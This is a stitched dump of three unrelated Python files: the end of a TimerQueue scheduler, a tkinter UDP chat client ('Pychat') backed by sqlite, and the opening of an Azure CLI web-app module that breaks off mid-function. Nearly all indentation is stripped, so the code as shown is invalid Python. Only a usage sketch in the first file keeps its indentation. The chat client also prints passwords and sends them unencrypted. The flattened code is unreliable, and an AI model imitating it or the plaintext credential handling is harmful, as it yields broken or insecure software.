# Calc sleep time
if next_expired_time:
now = time()
if now < next_expired_time:
sleep_time = next_expired_time - now
else:
sleep_time = 0.1
else:
sleep_time = 1
try:
wakeup = wakeup_queue.get(timeout=sleep_time)
if wakeup is None:
break
except Queue.Empty:
pass
logger.info("TimerQueue stopped.")
def _get_expired_timers(self):
next_expired_time = 0
now = time()
expired_timers = []
with self._lock:
for timer in self._timers:
if timer.get_expiration() <= now:
expired_timers.append(timer)
if expired_timers:
del self._timers[:len(expired_timers)]
if self._timers:
next_expired_time = self._timers[0].get_expiration()
return (next_expired_time, expired_timers)
def _reset_timers(self, expired_timers):
has_new_timer = False
with self._lock:
cancelling_timers = self._cancelling_timers
for timer in expired_timers:
if timer.ident() in cancelling_timers:
logger.info("Timer=%s has been cancelled", timer.ident())
continue
elif timer.get_interval():
# Repeated timer
timer.update_expiration()
self._timers.add(timer)
has_new_timer = True
cancelling_timers.clear()
if has_new_timer:
self._wakeup()
def _wakeup(self, something="not_None"):
self._wakeup_queue.put(something)
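if __name__ == "__main__":
    # Minimal usage sketch, assuming Timer(callback, when, interval) invokes `callback`
    # once the unix timestamp `when` has passed and repeats every `interval` seconds:
    # schedule a repeating timer, let it fire a few times, then shut the queue down.
    import time as _time
    tq = TimerQueue()
    tq.start()
    tq.add_timer(lambda: logger.info("timer fired"), time() + 1, 2)
    _time.sleep(6)
    tq.tear_down()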
|
Pychat(client).py
|
from tkinter import *
from tkinter import messagebox
import threading
import socket
import time
from itertools import cycle
from ast import literal_eval
import sqlite3
ad=False
serv_search=('127.0.0.1',5001)
serv_online=('127.0.0.1',5002)
serv_del=('127.0.0.1',5003)
serv_msg=('127.0.0.1',10101)
check=False
a=["#D2691E", "#D0661E", "#CE631F", "#CC601F", "#CA5E20", "#C85B20", "#C65821", "#C45521", "#C25322", "#C05022", "#BE4D23", "#BC4A23", "#BA4824", "#B84524", "#B64225", "#B43F25", "#B23D26", "#B03A26", "#AE3727", "#AC3427", "#AA3228", "#A82F28", "#A62C29", "#A52A2A", "#A0282E", "#9C2632", "#982436", "#94223A", "#90203E", "#8C1E42", "#881C46", "#841A4A", "#80184E", "#7C1652", "#781556", "#73135A", "#6F115E", "#6B0F62", "#670D66", "#630B6A", "#5F096E", "#5B0772", "#570576", "#53037A", "#4F017E", "#4B0082", "#47007C", "#440076", "#400070", "#3D006A", "#390064", "#36005E", "#330058", "#2F0052", "#2C004C", "#280046", "#250041", "#22003B", "#1E0035", "#1B002F", "#170029", "#140023", "#11001D", "#0D0017", "#0A0011", "#06000B", "#030005", "#000000", "#080401", "#110802", "#190D04", "#221105", "#2A1506", "#331A08", "#3C1E09", "#44220A", "#4D270C", "#552B0D", "#5E300F", "#673410", "#6F3811", "#783D13", "#804114", "#894515", "#924A17", "#9A4E18", "#A35219", "#AB571B", "#B45B1C", "#BD601E"]
ret=""
b=a[1:]+a[0:1]
c=a[2:]+a[0:2]
d=a[3:]+a[0:3]
e=a[4:]+a[0:4]
f=a[5:]+a[0:5]
g=a[6:]+a[0:6]
h=a[7:]+a[0:7]
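# back() animates the login screen: it cycles the canvas triangles, the active
# button and (when shown) the Back button through shifted copies of the palette
# above until the global `check` flag is set.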
def back(x,y,z):
global check
for i in cycle(range(len(a))):
try:
if check==True:
return
y.config(bg=b[i])
x.itemconfig(z[0],fill=a[i])
x.itemconfig(z[1],fill=b[i])
x.itemconfig(z[2],fill=c[i])
x.itemconfig(z[3],fill=d[i])
x.itemconfig(z[4],fill=e[i])
x.itemconfig(z[5],fill=f[i])
x.itemconfig(z[6],fill=g[i])
x.itemconfig(z[7],fill=h[i])
if ret!="":
ret.config(bg=b[i])
time.sleep(0.3)
except:
pass
class login:
def __init__(self):
global ret
self.root=Tk()
self.host='127.0.0.1'
self.port=0
self.server=('127.0.0.1',5000)
self.s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
self.s.bind((self.host,self.port))
#self.root.bind("<Key>",self.d)
self.username=""
self.cp=""
self.cpp=""
self.rett=""
self.lab=""
self.labb=""
self.window=Canvas(self.root,width=800,height=600)
self.user=Entry(self.window,width=30,fg="#D3D3D3",font=("",12))
self.user.insert(0,"Username")
self.window.create_window(400,300,window=self.user)
self.user.bind("<Button-1>",self.d)
self.pas=Entry(self.window,width=30,fg="#D3D3D3",font=("",12))
self.window.create_window(400,340,window=self.pas)
self.pas.insert(0,"Password")
self.pas.bind("<Button-1>",self.p)
self.log=Button(self.window,text="Log in",width=25,fg="#D3D3D3",command=self.logg)
self.login=self.window.create_window(400,380,window=self.log)
self.tri=[]
self.tri.append(self.window.create_polygon([0,0,0,150,200,0],fill="blue"))
self.tri.append(self.window.create_polygon([0,150,0,300,400,0,200,0]))
self.tri.append(self.window.create_polygon([0,300,0,450,600,0,400,0]))
self.tri.append(self.window.create_polygon([0,450,0,600,800,0,600,0]))
self.tri.append(self.window.create_polygon([0,600,200,600,800,150,800,0]))
self.tri.append(self.window.create_polygon([200,600,400,600,800,300,800,150]))
self.tri.append(self.window.create_polygon([400,600,600,600,800,450,800,300]))
self.tri.append(self.window.create_polygon([600,600,800,600,800,450]))
self.window.pack()
self.window.create_text(400,250,text="PyChat",fill="white",font=("Helvetica",24))
self.text=self.window.create_text(400,550,text="New User? Sign up.",font=("",14),fill="#D3D3D3")
self.window.tag_bind(self.text,"<Button-1>",self.si)
threading.Thread(target=back,args=(self.window,self.log,self.tri,)).start()
def logg(self):
global check
user=self.user.get()
pas=self.pas.get()
print(user+" "+pas)
msg="User "+user+" Pass "+pas
self.s.sendto(msg.encode('utf-8'),self.server)
data=""
while data=="":
data,addr=self.s.recvfrom(1024)
data=str(data.decode('utf-8'))
if data=="Success":
self.username=user
line,addr=self.s.recvfrom(50000)
with open('user.db','wb') as file:
file.write(line)
self.window.pack_forget()
check=True
c=chat(self)
else:
if self.lab=="":
self.lab=Label(self.window,text="Username or Password not correct",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Username or Password not correct")
return
def d(self,event):
if self.user.get()=="Username":
self.user.delete(0,END)
self.user.config(fg="black")
def si(self,event):
global ret
self.window.delete(self.login)
self.cp=Entry(self.window,width=30,fg="#D3D3D3",font=("",12))
self.cp.insert(0,"Confirm Password")
self.cp.bind("<Button-1>",self.cnf)
self.cpp=self.window.create_window(400,380,window=self.cp)
self.log.config(text="Signup",command=self.up)
self.login=self.window.create_window(400,420,window=self.log)
ret=Button(self.window,text="Back",width=25,fg="#D3D3D3",command=self.retn)
self.rett=self.window.create_window(400,460,window=ret)
self.window.delete(self.text)
self.pas.delete(0,END)
self.pas.config(fg="#D3D3D3",show="")
self.pas.insert(0,"Password")
if self.lab!="":
self.window.delete(self.labb)
self.lab=""
def up(self):
global check
user=self.user.get()
pas=self.pas.get()
cnf=self.cp.get()
if " " in user:
if self.lab=="":
self.lab=Label(self.window,text="Username cannot contain spaces",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Username cannot contain spaces")
return
elif pas!=cnf:
if self.lab=="":
self.lab=Label(self.window,text="Password does not match",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Password does not match")
return
else:
global check
user=self.user.get()
pas=self.pas.get()
print(user+" "+pas)
msg="Signup"+" "+user+" "+pas
self.s.sendto(msg.encode('utf-8'),self.server)
data=""
while data=="":
data,addr=self.s.recvfrom(1024)
data=str(data.decode('utf-8'))
if data=="Success":
self.username=user
self.window.pack_forget()
check=True
c=chat(self)
else:
if self.lab=="":
self.lab=Label(self.window,text="Username already exists",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Username already exists")
return
def retn(self):
global ret
if self.lab!="":
self.window.delete(self.labb)
self.lab=""
self.window.delete(self.cpp)
self.window.delete(self.login)
self.window.delete(self.rett)
self.pas.delete(0,END)
self.pas.config(fg="#D3D3D3",show="")
self.pas.insert(0,"Password")
ret=""
self.log.config(text="Log in",command=self.logg)
self.login=self.window.create_window(400,380,window=self.log)
self.text=self.window.create_text(400,550,text="New User? Sign up.",font=("",14),fill="#D3D3D3")
self.window.tag_bind(self.text,"<Button-1>",self.si)
def cnf(self,event):
if self.cp.get()=="Confirm Password":
self.cp.delete(0,END)
self.cp.config(fg="black",show="*")
def p(self,event):
if self.pas.get()=="Password":
self.pas.delete(0,END)
self.pas.config(fg="black",show="*")
class chat:
def __init__(self,other):
self.lock=threading.Lock()
self.other=other
self.root=other.root
self.tx=""
self.con=""
self.cur=""
self.window=Canvas(self.root,width=800,height=600,background="white")
self.temp=""
self.lab=Label(self.window,text="PyChat",fg="green",bg="#D3D3D3",font=("",20))
self.window.create_window(0,39,window=self.lab,anchor=S+W,width=810)
self.fr=Frame(self.window)
self.window.create_window(0,39,window=self.fr,anchor=N+W,width=804,height=524)
self.can=Canvas(self.fr,width=804,height=524)
self.frame=Frame(self.can,bg="blue")
#self.window.create_rectangle(0,35,800,0,fill="#D3D3D3")
#self.out=self.window.create_text(50,20,text="PyChat",fill="green",font=("",20))
self.scrollbar=Scrollbar(self.can,orient=VERTICAL,command=self.can.yview)
self.can.configure(yscrollcommand=self.scrollbar.set)
self.scrollbar.pack(side=RIGHT,fill=Y)
self.lab.bind("<Button-1>",self.page)
self.root.protocol("WM_DELETE_WINDOW",self.ask)
self.can.pack(side=RIGHT,fill=BOTH,expand=True)
self.can.create_window(0,0,window=self.frame,anchor=N+W)
self.search=Entry(self.window,width=20,font=("",12))
self.window.create_window(400,580,window=self.search)
self.window.create_text(240,580,text="Add Username:",fill="green",font=("",12))
self.sbut=Button(self.window,text="ADD",font=("",12),command=self.add)
self.window.create_window(530,580,window=self.sbut)
self.window.pack()
self.frame.bind("<Configure>", self.onFrameConfigure)
self.chats=[]
self.warn=""
self.warnn=""
self.status=""
threading.Thread(target=self.msg).start()
threading.Thread(target=self.msg).start()
threading.Thread(target=self.msg).start()
threading.Thread(target=self.msg).start()
threading.Thread(target=self.load).start()
def load(self):
for i in self.chats:
i.pack_forget()
i.destroy()
self.chats=[]
self.con=sqlite3.connect('user.db')
self.cur=self.con.cursor()
self.cur.execute("CREATE TABLE IF NOT EXISTS buddy(user varchar(64) not null,msg INT,num INT,PRIMARY KEY(user))")
self.cur.execute("CREATE TABLE IF NOT EXISTS data(user varchar(64) not null,msg varchar(10000))")
self.cur.execute("SELECT user FROM buddy ORDER BY num ASC")
line=self.cur.fetchall()
print(line)
if line:
for i in line:
l=Label(self.frame,text=i,font=("",20),width=50,justify=RIGHT)
self.chats.append(l)
l.bind("<Button-1>",lambda x,t=l["text"]:self.texting(t))
l.pack()
self.con.commit()
self.con.close()
def onFrameConfigure(self, event):
self.can.configure(scrollregion=self.can.bbox("all"))
def add(self):
global ad
global serv_search
#ad=True
if self.search.get()!=self.other.username:
self.other.s.sendto((self.search.get()).encode('utf-8'),serv_search)
self.search.delete(0,END)
def texting(self,m):
print(m)
self.other.s.sendto((self.other.username+" "+m).encode('utf-8'),serv_online)
self.window.pack_forget()
self.tx=text(self,m)
#def ba(self):
#global serv_del
#self.other.s.sendto(self.other.username.encode('utf-8'),serv_del)
#self.temp.pack_forget()
#self.window.pack()
def update(self,data):
self.lock.acquire()
con=sqlite3.connect('user.db')
cur=con.cursor()
cur.execute("UPDATE buddy SET num=num+1")
cur.execute("INSERT INTO buddy VALUES(?,0,1)",(data,))
con.commit()
con.close()
self.lock.release()
def rem(self,num=0):
if num==0:
self.window.delete(self.warnn)
else:
self.tx.window.delete(self.warnn)
def msg(self):
global serv_search
global serv_online
data=""
while not ad:
data,addr=self.other.s.recvfrom(1024)
data=data.decode('utf-8')
if addr==serv_search:
if data!="no":
for i in self.chats:
if i["text"]==data[0]:
return
threading.Thread(target=self.update,args=(data,)).start()
threading.Thread(target=self.load).start()
else:
self.warn=Label(self.window,text="Username does not exists",bg='red',fg='white')
self.warnn=self.window.create_window(0,0,window=self.warn,width=804,anchor=N+W)
self.root.after(4000,self.rem)
elif addr==serv_online:
if data[0]!="[":
while not hasattr(self.tx,'lab'):
pass
self.tx.lab.config(text=self.tx.name+" - "+str(data))
self.tx.addr=""
#self.status=self.temp.create_text(200,200,text=str(data),font=("",20))
else:
while not hasattr(self.tx,'lab'):
pass
self.tx.lab.config(text=self.tx.name+" - Online")
self.tx.addr=literal_eval(data)
self.tx.addr[1]=int(self.tx.addr[1])
self.tx.addr=tuple(self.tx.addr)
elif addr==serv_msg:
if data[0]!="[":
self.tx.lab.config(text=self.tx.name+" - "+str(data))
self.tx.addr=""
else:
self.tx.lab.config(text=self.tx.name+" - Online")
self.tx.addr=literal_eval(data)
self.tx.addr[1]=int(self.tx.addr[1])
self.tx.addr=tuple(self.tx.addr)
else:
data=data.split(':::::')
if self.tx!="" and addr==self.tx.addr:
Label(self.tx.frame,text=data[1],font=("",14),width=50,bg="red",anchor=W,wraplength=300).pack()
threading.Thread(target=self.save,args=(self.tx.name,data[1],)).start()
elif self.tx!="":
self.warn=Label(self.tx.window,text=data[0]+": "+data[1],bg='red',fg='white')
self.warnn=self.tx.window.create_window(0,0,window=self.warn,width=804,anchor=N+W)
self.root.after(4000,self.rem)
for i in self.chats:
if i["text"]==data[0]:
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
return
threading.Thread(target=self.update,args=(data[0],)).start()
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
else:
self.warn=Label(self.window,text=data[0]+": "+data[1],bg='red',fg='white')
self.warnn=self.window.create_window(0,0,window=self.warn,width=804,anchor=N+W)
self.root.after(4000,self.rem)
for i in self.chats:
if i["text"]==data[0]:
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
if self.chats[0]["text"]!=data[0]:
threading.Thread(target=self.load).start()
return
#threading.Thread(target=self.update,args=(data[0],)).start()
con=sqlite3.connect('user.db')
cur=con.cursor()
cur.execute("UPDATE buddy SET num=num+1")
cur.execute("INSERT INTO buddy VALUES(?,0,1)",(data[0],))
con.commit()
con.close()
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
threading.Thread(target=self.load).start()
def page(self,event):
global check
check=False
self.window.pack_forget()
self.other.window.pack()
threading.Thread(target=back,args=(self.other.window,self.other.log,self.other.tri)).start()
#def ad(self,event):
#print("Add")
def ask(self):
global serv_msg
if messagebox.askokcancel("Quit","Do you want to quit?"):
#self.other.s.sendto(("Out "+self.other.username).encode('utf-8'),self.other.server)
with open("user.db","rb") as file:
line=file.read()
self.other.s.sendto(line,serv_msg)
self.root.destroy()
def save(self,name,msg):
self.lock.acquire()
con=sqlite3.connect('user.db')
cur=con.cursor()
if name!=self.other.username:
cur.execute("SELECT num FROM buddy WHERE user=?",(name,))
p=cur.fetchone()
cur.execute("UPDATE buddy SET num=num+1 WHERE num<?",p)
cur.execute("UPDATE buddy SET msg=msg+1,num=1 WHERE user=?",(name,))
cur.execute("SELECT msg FROM buddy WHERE user=?",(name,))
p=cur.fetchone()
cur.execute("INSERT INTO data VALUES(?,?)",(name+":"+self.other.username+":"+str(p[0]),msg,))
else:
cur.execute("SELECT num FROM buddy WHERE user=?",(self.tx.name,))
p=cur.fetchone()
cur.execute("UPDATE buddy SET num=num+1 WHERE num<?",p)
cur.execute("UPDATE buddy SET msg=msg+1,num=1 WHERE user=?",(self.tx.name,))
cur.execute("SELECT msg FROM buddy WHERE user=?",(self.tx.name,))
p=cur.fetchone()
cur.execute("INSERT INTO data VALUES(?,?)",(self.other.username+":"+self.tx.name+":"+str(p[0]),msg,))
con.commit()
con.close()
self.lock.release()
class text:
def __init__(self,other,m):
self.root=other.root
self.other=other
self.obj=self.other.chats
self.name=m
self.window=Canvas(self.root,width=800,height=600,background="white")
self.temp=""
self.addr=""
self.lab=Label(self.window,text=m,fg="green",bg="#D3D3D3",font=("",20))
self.window.create_window(0,39,window=self.lab,anchor=S+W,width=810)
self.lab.bind("<Button-1>",self.ba)
self.fr=Frame(self.window)
self.window.create_window(0,39,window=self.fr,anchor=N+W,width=804,height=524)
self.can=Canvas(self.fr,width=804,height=524)
self.frame=Frame(self.can)
self.scrollbar=Scrollbar(self.can,orient=VERTICAL,command=self.can.yview)
self.can.configure(yscrollcommand=self.scrollbar.set)
self.scrollbar.pack(side=RIGHT,fill=Y)
self.search=Entry(self.window,width=40,font=("",12))
self.window.create_window(300,580,window=self.search)
self.sbut=Button(self.window,text="Send",font=("",12),command=self.send)
self.window.create_window(530,580,window=self.sbut)
self.can.pack(side=RIGHT,fill=BOTH,expand=True)
self.can.create_window(0,0,window=self.frame,anchor=N+W)
self.window.pack()
self.frame.bind("<Configure>", self.onFrameConfigure)
threading.Thread(target=self.load).start()
def onFrameConfigure(self, event):
self.can.configure(scrollregion=self.can.bbox("all"))
def ba(self,e):
global serv_del
self.other.other.s.sendto(self.other.other.username.encode('utf-8'),serv_del)
self.window.pack_forget()
self.other.window.pack()
if self.obj!=self.other.chats:
threading.Thread(target=self.other.load).start()
self.other.tx=""
def send(self):
if self.addr!="":
msg=self.search.get()
self.other.other.s.sendto((self.other.other.username+":::::"+msg).encode('utf-8'),self.addr)
self.search.delete(0,END)
Label(self.frame,text=msg,font=("",14),width=50,anchor=E,bg="blue",wraplength=300).pack()
threading.Thread(target=self.other.save,args=(self.other.other.username,msg,)).start()
"""else:
msg=self.search.get()
self.other.other.s.sendto(msg.encode('utf-8'),serv_msg)
self.search.delete(0,END)
Label(self.frame,text=i[1],font=("",14),width=90,justify=RIGHT,wraplength=300).pack()
threading.Thread(target=self.save,args=(self.other.other.username,msg,)).start()"""
def load(self):
self.con=sqlite3.connect('user.db')
self.cur=self.con.cursor()
self.cur=self.cur.execute("SELECT * FROM data WHERE (user LIKE ? OR user LIKE ?)",(self.name+"%",self.other.other.username+":"+self.name+"%",))
line=self.cur.fetchall()
if line:
for i in line:
if i[0].startswith(self.name):
Label(self.frame,text=i[1],font=("",14),pady=20,width=50,bg="red",anchor=W,wraplength=300).pack()
else:
Label(self.frame,text=i[1],font=("",14),pady=20,width=50,bg="blue",anchor=E,wraplength=300).pack()
l=login()
l.root.resizable(0,0)
l.root.mainloop()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from nacl import encoding, public
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError, MutuallyExclusiveArgumentError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import _normalize_sku, get_sku_name, retryable_method, raise_missing_token_suggestion
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This keeps the existing app settings when the given name refers to a webapp that already exists.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack property in metadata to display the stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a helper method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # only one of these option combinations may be specified
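# Illustrative truth table for the option check above (a sketch derived from the logic, not exhaustive):
#   validate_container_app_create_options(runtime='NODE|12-lts')                           -> True
#   validate_container_app_create_options(deployment_container_image_name='nginx')         -> True
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE',
#                                          multicontainer_config_file='compose.yml')        -> True
#   validate_container_app_create_options(runtime='NODE|12-lts',
#                                          deployment_container_image_name='nginx')         -> False
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE')             -> False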
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
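# Expected behavior, illustrated (examples derived from the logic above; image names are hypothetical):
#   parse_docker_image_name('myregistry.azurecr.io/myimage:latest')  -> 'myregistry.azurecr.io'
#   parse_docker_image_name('localhost:5000/myimage')                -> 'localhost:5000'
#   parse_docker_image_name('library/nginx')                         -> None  (Docker Hub implied)
#   parse_docker_image_name('nginx')                                 -> None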
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
